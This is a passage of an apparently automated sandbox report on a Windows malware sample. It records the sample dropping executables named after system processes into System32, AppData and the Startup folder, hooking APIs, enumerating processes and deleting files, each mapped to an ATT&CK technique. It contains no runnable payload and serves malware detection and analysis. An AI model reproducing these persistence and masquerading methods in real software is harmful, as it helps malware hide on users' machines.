4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46776 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46883 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46833 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46842 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46810 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46975 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46788 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46854 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46815 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46840 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46869 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46762 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46824 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46980 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46893 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46899 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46942 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46849 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46909 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46759 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46752 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46894 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46797 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46841 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46843 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46735 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46757 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000940]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00000940]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000940]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3CC1F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000940]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000940]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000940]\n \"IEXPLORER.EXE.67E3CD97.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3CBAD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000940]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000940]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000940]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000940]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000940]\n \"D3_08.EXE.67E3D312.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000940]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000940]\n \"IEXPLORER.EXE.67E3CBB0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67E3D31A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter 48d277cd2a9edb01 & H:</3 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter a52735d82a9edb01 & a58ff939339edb01 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter b88ae0d82a9edb01 & b8f2a43a339edb01 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter a39f65db2a9edb01 & a3072a3d339edb01 (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"FileTimeToLocalFileTime\" with parameter 0e38c7db2a9edb01 & 0ea08b3d339edb01 (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"Process32NextW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"OpenMutexW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\System32\\dinotify.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n 